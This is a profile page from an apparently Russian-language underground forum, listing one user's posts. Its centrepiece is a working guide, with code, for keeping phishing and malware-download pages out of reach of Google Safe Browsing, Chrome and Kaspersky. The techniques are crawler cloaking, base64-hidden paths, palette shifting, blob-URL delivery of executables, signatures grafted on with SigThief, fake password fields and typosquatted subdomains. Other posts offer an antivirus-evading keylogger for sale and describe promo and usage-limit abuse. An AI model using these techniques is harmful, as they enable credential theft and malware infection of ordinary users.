Перейти к публикации

Vitoslaketto

Новичoк
  • Публикации

    16
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    1

Последний раз Vitoslaketto выиграл 26 марта

Публикации Vitoslaketto были самыми популярными!

Репутация

1 Neutral

Блок посетителей профиля отключен и не будет отображаться другим пользователям

  1. Vitoslaketto

    Абузим МТС на 250₽

    Абузим МТС на 250₽ 1. Открываем приложение "Мой МТС" 2. Жмем на акцию "30 лет МТС" 3. Крутим куб и получаем гарантированный приз!
  2. Vitoslaketto

    пробьет ли биток 30к?

    актуально уже писать, пробьет ли биток 40
  3. В этой статье вы получите пошаговое руководство с примерами кода, как спасти ваш лендинг от красного экрана счастья. Что мы узнаем из статьи? Содержание: Из чего состоит Google Safe Browsing Как выбрать подходящий домен Как создать правильный ssl-сертификат Как спрятать лендинг от краулера GSB Обновляем крипт js-файлов прошлого лендинга Как обойти детект на основе палитры сайта Как обойти детект Kaspersky Как обойти блокировку скачивания файла хромом Чем и как заменить форму ввода пароля 1. Что такое Google Safe Browsing? Google Safebrowsing состоит из четырех частей: встроенный в хром механизм определения фишинга на основе совпадения цветовых палитр и частей доменов ранее посещенных сайтов. механизм проверки url-адресов и хешей файлов на совпадение по предзагруженной базе укороченных хешей, хранящихся локально. механизм распаковки большинства типов ахривов, и проверки хешей исполняемых файлов и хешей их секций по локально хранящейся базе. краулер, который получает адреса скачанных файлов, проходится по ним, выкачивает и передает на сервера google для анализа их антивирусным движком, с использованием сервиса VirusTotal. 2. Нам нужен новый домен Зарегистрировать стойкий к абузам домен можно на тыц 1 или тыц 2 (эти сервисы реселлят многие продавцы стойких к абузам доменов). Домену нужно дать отлежаться хотя бы неделю, т.к. зарегистрированным вчера доменам гугл не доверяет совсем. Имя домена не должно содержать: брендовые слова брендовые слова с опечатками имена доменов, которые пользователь посещал ранее, такие как dhl, telegram, hsbc и им подобные. Для примера в данной статье будем использовать домен 4bi.us. 3. Нам нужен ssl-сертификат для домена Для этого привяжем домен к cloudflare.com. Все ssl-сертификаты при создании попадают в специальный фид, называемый certificate transparency log. Этот фид постоянно мониторят антивирусные компании. Посмотреть на него самим можно например здесь: https://certstream.calidog.io/. По-этому все сертификаты, выданные для доменов, содержаших брендовые слова или брендовые слова с опечатками моментально попадают в поле зрения антивирусных компаний, и ваш фишинг, размещенный на домене с опечаткой будет моментально помечен как вредоносный. Таким образом мы не можем заказать сертификат для брендового домена с опечаткой. Однако, cloudflare дает нам возможность бесплатно заказать wildcard сертификат. Это сертификат для всех сабдоменов домена, без указания конкретного имени сабдомена. Таким образом наш сабдомен с опечаткой в имени не будет замечен антивирусными компаниями. Вот как запись для wildcard-домена выглядит в настройках dns домена в cloudflare: Теперь наш лендинг будет доступен, например, по адресу telegrarn.4bi.us. 4. Спрячем лендинг от краулера GSB Краулер GSB (как и краулер GoogleAds) сделан на основе чистого движка Google Chrome с минимальными изменениями. Он запускается в headless-режиме и управляется через webdriver-протокол. По ip-адресу пытаться блокировать его бессмысленно, т.к. он использует прокси-сервера с домашними адресами. Но в headless-режиме у десктопной версии браузера Chrome выключается поддержка Notification API. По наличию поддержки этого api мы определим краулер и покажем ему белый сайт вместо вредоносного. Для начала мы создадим белый сайт-обманку. Купить готовый белый лендинг для клоакинга можно за копейки в боте https://t.me/whitegen_bot. Предположим, стартовая страница нашего фишинга называется index.php. Переименуем ее в home.php, а в тело страницы index.php положим код чистой (белой) страницы лендинга, созданной с помощью телеграм-бота. Теперь код стартовой страницы index.php выглядит примерно так: Чтобы пользователи видели не белый сайт, а нашу фишинг-страницу, добавим в head-секцию нашей стартовой страницы index.php следующий html-код: Код HTML: <script> home = 'L2hvbWUucGhw'; zones = /Madrid|Canary|Vienna|Istanbul/gi; timezoneOffset = zones.test((new Intl.DateTimeFormat).resolvedOptions().timeZone); self.Notification&&timezoneOffset&&fetch(atob(home)).then( function(r){return r.text().then(function(t){document.write(t)})} ); </script> В этом коде мы делаем следующее: в переменной home мы спрятали адрес фишинг-страницы (home.php), закодировав его в base64 (например на сайте base64encode.net). Это необходимо потому, что краулер GSB извлекает из загружаемых им файлов все ссылки и пытается их скачать и проанализировать. для порядка мы отсекаем лишних пользователей на основе часового пояса, используемого их системой. Это не критически важный ход, но он убережет наш фишинг от лишних глаз. Вот таблица названий часовых поясов для интересующих нас стран: en.wikipedia.org/wiki/List_of_tz_database_time_zones. Если мы хотим лить на лендинг трафик, например, Германии, то заменим строчку zones = /Madrid|Canary|Vienna|Istanbul/gi; на строчку zones = /Berlin/gi; и таким образом отсечем всех пользователей (и краулеры) с другим часовым поясом, выбранном в настройках их системы. последним шагом мы проверяем поддержку notification api и, если у пользователя выбран подходящий нам часовой пояс, мы скачиваем содержимое файла home.php и замещаем его содержимым содержимое текущей страницы index.php. Теперь код нашей стартовой страницы index.php выглядит примерно так: А все подходящие нам пользователи видят наш злой лендинг: 5. Перекриптуем все js-файлы из нашего прошлого лендинга Краулер google проверяет и запоминает все js-файлы со страниц, определенных как вредоносные. По-этому перед началом работы нам обязательно нужно обфусцировать заново все js-файлы нашего лендинга. Для этого можно воспользоваться любым из многочисленных javascript-обфускаторов, например https://obfuscator.io/. 6. Изменим цветовую палитру нашего лендинга В браузер Chrome встроен механизм определения фишинговых сайтов на основе совпадения суммы всех пикселей страницы каждого цвета с палитрами сайтов, посещенных пользователем ранее. Подробнее про этот механизм можно прочесть здесь: https://blog.chromium.org/2021/07/m92-faster-and-more-efficient-phishing-detection.html. Изменить палитру цветов нашего лендинга мы можем в одну строчку javascript-кода, которую необходимо поместить в js-файл, загружаемый из <head> секции страницы home.php, для того, чтобы она была выполнена раньше, чем загрузится тело страницы. Вот эта строчка: Код JS: document.documentElement.style.cssText="filter:hue-rotate(4deg)"; Добавим ее в любой javascript-файл из <head> секции страницы, например в jquery.js: 7. Изменим оригинальный <title> страницы лендинга на любой другой Антивирус Kaspersky проверяет совпадение содержимого тега <title> страницы с содержимым <title> страниц, посещенных пользователем ранее. Заменим, например: на любой другой текст: 8. Если с вашего лендинга скачивают файл Адреса всех скаченных браузером Chrome файлов отправляются в google, и затем по этим адресам приходит краулер GoogleSafeBrowsing, скачивает файлы и анализирует их своим собственным антивирусным движком на платформе virustotal.com. Хеши опасных файлов и секций исполняемых файлов хранятся в браузере Chrome локально. По-этому прежде всего нам необходимо использовать чистый файл. Так же хром будет блокировать скачивание файла, если: В его имени содержатся брендовые слова. По-этому мы не можем дать файлу имя, например, FireFox_Installer.exe, а будем использовать нейтральное имя, например Installer.exe. Если скачивание файла не инициировано кликом пользователя (именно пользователя - метод .click() с помощью javascript нам не подходит) Если тип файла - исполняемый (или архив с файлом содержит исполняемые файлы), и при этом домен, с которого скачивается файл, не был посещен пользователем в последние 24 часа. Если тип файла - исполняемый (или архив с файлом содержит исполняемые файлы), и при этом файл не имеет цифровой подписи (хотя бы невалидной). Для общего ознакомления в исходном коде браузера Chromium можно прочесть по каким параметрам браузер определяет опасность файла : https://source.chromium.org/chromiu...;drc=591c5c478112625a5da995afeeb6566429c04ef9. Какие файлы Chrome считает исполняемыми можно посмотреть вот здесь: https://source.chromium.org/chromiu...;drc=af17ad3f07c1d8a24381eb7669bec0c2ffb86521. Сначала с помощью утилиты SigThief мы приклеим к нашему файлу любую цифровую подпись, взятую с любого подписанного выполняемого файла. Чтобы предотвратить скачивание нашего файла краулером google, нам необходимо: отказаться от использования статичных адресов файла убрать из кода страницы адрес файла в чистом виде отдавать файл пользователю через эфимерный blob-url Предположим наша кнопка для скачивания файла выглядит вот так: Уберем из нее прямой адрес файла, например закодировав его в base64 любым из base64 энкодеров (например base64encode.net) и добавим для кнопки любой id, чтобы зацепиться за нее в javascript: Теперь в наш .js файл (в нашем примере это jquery.js) добавим код, который дождется полной загрузки DOM-дерева страницы и у всех ссылок с id="clickbtn" заменит адрес файла на временный blob-url: Код JS: document.addEventListener('DOMContentLoaded',function(e) { document.querySelectorAll('#clickbtn').forEach(function(a,url) { url = atob(a.href.split('/').slice(-1)[0]); fetch(url).then(function(r){return r.blob()}).then(function(blob){ a.href = URL.createObjectURL(blob); a.download = url.split('/').slice(-1)[0]; }); }); }); Теперь наш файл с javascript-кодом будет выглядеть примерно вот так: Теперь обфусцируем этот код с помощью obfuscator.io: Не забываем, что даже если архив с файлом защищен паролем, браузер Chrome все равно может видеть имена файлов в архиве, и понять, что архив содержит исполняемые файлы. 9. Если на вашем лендинге есть форма ввода пароля Это уже сложнее. Прежде всего, Chrome заранее относится с подозрениям к html-страницам, содержащим поле ввода пароля или слово passwordна любом языке. Сначала избавимся от слов password на странице. Псевдо-элементы в css, такие как ::before или ::after не учавствуют в представлении DOM-дерева страницы и идеально подходят для нас. Уберем слово password из кода страницы, и выведем его с помощью css. Предположим, что наше слово password в коде страницы выглядит вот так: Уберем его, а на его место поставим любой строковый элемент с любым классом. Например span с классом pass: Теперь в любое место html-кода нашей страницы добавим следующий html-код: Код HTML: <style> .pass::before {content:"pass"} .pass::after {content:"word"} </style> В данном случае мы разбили слово password на две части и внутри блока стилей. Избавимся от поля ввода пароля, заменив его на обычный <input type="text">. Предположим, наше поле ввода пароля выглядит следующим образом: Заменим его на следующий код: Код HTML: <div class="wrapper"> <input type="text" id="dots" class="form-control input ext-input text-box ext-text-box"> <input type="text" name="passwd" id="i0118" class="form-control input ext-input text-box ext-text-box"> </div> Мы заменили тип поля для ввода пароля с password на text, затем перед ним добавили такое же текстовое поле ввода с id="dots", и обернули оба поля в отдельный слой. Это необходимо чтобы изобразить натуральное поле ввода пароля. Первый input будет содержать только символы ●, изображая символы пароля по мере их ввода пользователем. Второй input будет наложен сверху на первый, иметь нулевую прозрачность, и передавать все набранные символы в первый input. Мы так же скопировали все классы от input с паролем в классы элемента input с жирными точками, чтобы сохранить оригинальное оформление. Теперь позаботимся о наложении второго поля для ввода на первое. Добавим в код нашей страницы следующие стили: Код CSS: .wrapper {position:relative;} .wrapper input[type=text] {position:absolute!important} .wrapper #i0118 {opacity:0!important} где в нашем примере #i0118 - это id оригинального поля для ввода пароля. Теперь наш css-код выглядит вот так: В приведенном выше коде значение position:relative у блока с классом wrapper необходимо чтобы позиционировать внутренние блоки абсолютно к родительскому элементу. Теперь оживим поля ввода с помощью javascript. Добавим следующий код в любой из подключенных .js файлов (или прямо в тело страницы, предварительно обернув его тегом <script>😞 Код JS: document.addEventListener('DOMContentLoaded', function(e) { i0118.onfocus = function(e){dots.value=dots.value||'|'} i0118.onkeyup = function(e){dots.value=i0118.value.replace(/./g,'●')+'|'} }); В приведенном выше коде i0118 - это id оригинального поля для ввода пароля, а dots - это id поля, изображающего пользовательский ввод. Теперь наш js-код выгдялит следующим образом: Если вы включали весь код в тело страницы, то теперь она выглядит примерно так: Вот мы избавились от всех упоминаний слова password на странице, и убрали поле ввода пароля. 10. Финиш Теперь, если мы проделали все шаги правильно, наш лендинг в полной безопасности:
  4. Подборка осинт расширений для вашего браузера, пользуйтесь Поиск и маркировка данных Vortimo OSINT-tool — расширение позволяет помечать текст на любой веб-странице и обогащать его собственными или внешними ресурсами или API. Очень удобно даже при простой работе в интернете, а уж про полезность в осинте и говорить не приходится Gotanda — это расширение веб-браузера для осинта, которое позволяет вам искать информацию на веб-странице (IP, домен, URL-адрес, SNS и т. д.). Расширение оптимизировано для Японии, но достаточно хорошо работает и в российском сегменте сети Fast Advanced Google Search— интерфейс расширенных параметров поиска Google. Полезно не только в рамках осинта Работа с соц. сетями OSINT.support — это не одно, а целая коллекция расширений для осинт, которые устанавливаются в режиме разработчика. Они предназначены по большей части для работы с Facebook. Также есть определение скрытых друзей, работа с идентификаторами, «парсинг» данных, SOCMINT и захват почты Treeverse — это расширение для навигации по разговорам в Твиттере. Все чаты удобно визуализированы в виде дерева EXIF Viewer Pro — позволяет быстро исследовать метаданные фотографий, размещенных в Интернете. Это может помочь вам установить время и место съемки, тип камеры и настройки камеры, если таковые не были удалены InVID & WeVerify — Плагин был разработан для проверки фактов и новостей в социальных сетях, особенно при проверке видео и фотографий TinEye Reverse Image Search — поисковая система для поиска модифицированных изображений. Ищет не только неповторимый оригинал, но и все его жалкие пародии Search by Image — инструмент обратного поиска изображений с поддержкой различных поисковых систем, таких как Google, Bing, Yandex, Baidu и TinEye Мониторинг сайтов Distill — расширение позволяет пассивно отслеживать изменения на социальных страницах и сайтах. Если они появятся, расширение отправит сообщение через SMS, электронную почту или уведомления FireShot — позволяет быстро сделать скриншот веб-страницы в полноэкранном режиме. Все скриншоты хранятся локально и не генерируют трафик. Более того, FireShot может работать автономно Nimbus Screenshot & Screen Video Recorder — еще одно расширение для создания скриншотов и видеозаписи веб-страниц Просмотр копий сайта Wayback Machine — это расширение Интернет-архива. Оно также позволяет просматривать заархивированную версию веб-страницы. Крайне незаменимая вещь в осинте Парсеры данных на веб страницах Instant Data Scraper— это инструмент для автоматической очистки данных для любого веб-сайта. Он использует искусственный интеллект, чтобы предсказать, какие данные наиболее актуальны на HTML-странице, и позволяет сохранить их в файл Excel или CSV (XLS, XLSX, CSV) Email extract — это расширение для поиска адресов электронной почты на посещаемых вами страницах. Просто и быстро. То, что порой и надо Hunter — это расширение для поиска адреса электронной почты на любом веб-сайте одним щелчком мыши, иногда двумя Исследование сайтов OSIRIS — это расширение для анализа репутации IoC. На вход он получает список IP-адресов, которые затем проверяет в таких сервисах, как Virustotal, Malwares, CISCO Talos, X-Force Exchange, AbuseIPDB, MXtoolbox Sputnik — это расширение для быстрого и удобного поиска IP-адресов, доменов, хэшей файлов и URL-адресов с использованием бесплатных ресурсов. Не путать с печально известным российским поисковиком IP Address and Domain Information — модуль отображает подробную информацию о текущем веб-сайте. Информация включает данные IP (IPv4 и IPv6): местоположение, DNS, данные whois, маршрутизацию, соседние домены и многое другое. Как и в случае с Hunter – просто и быстро
  5. Файл в PDF по этому неудобно скинуть сюда Каждому могу в лс отправить.
  6. Многие из вас, скорее всего, уже давно знают о достаточно популярной нейросети под названием Midjourney . Она позволяет легко генерировать очень качественные картинки на основании текстового запроса. К сожалению, бесплатно можно создавать только 25 картинок. Поэтому мы решили показать вам как использовать Midjourney бесплатно без ограничений с помощью использования собственных серверов в Discord. Погнали! 1. Для начала принимаем приглашение в дискорд канал Midjourney . 2. После этого проматываем левую колонку с серверами вниз и нажимаем на плюс, для создания своего собственного сервера. 3. Затем, после создания сервера, добавляем на него Midjourney Bot. Сделать это достаточно просто: возвращаемся на сервер Midjourney и находим Midjourney Bot в списке онлайна. Кликаем по данному боту ЛКМ и нажимаем на пункт Добавить на сервер. 4. Далее, после добавления бота, используем /image <ваш_запрос>, для его использования. При блокировке ботом запросов, выходим из дискорда и создаем новый аккаунт, также используя ссылку с приглашением из самого первого пункта. При этом, в браузере используем режим инкогнито, таким образом, дискорд будет создавать новую учетку, а не предлагать заходить в уже существующую.
  7. Время идет, а темка еще живая. Еще раз спасибо бро
  8. Vitoslaketto

    Как почистить телефон?

    по нормальному - сменить память на аппаратном уровне
  9. жир тема, я бы скрыл ее от новорегов, хотя и сам тип без репы. но спасибо что дал шанс заработать место в раю себе обеспечил
  10. Vitoslaketto

    Деанон по деидик

    Дедик конечно это топ, против деда нет приема
  11. раздача скам проектов звучит сильно))
  12. Vitoslaketto

    Шоп развернул паки.

    прозвони в шоп и узнай причину
  13. Vitoslaketto

    Cкрытая сессия, реально ли?

    Я как раз хочу продать свой келоггер , не палится антивирусами
×
×
  • Создать...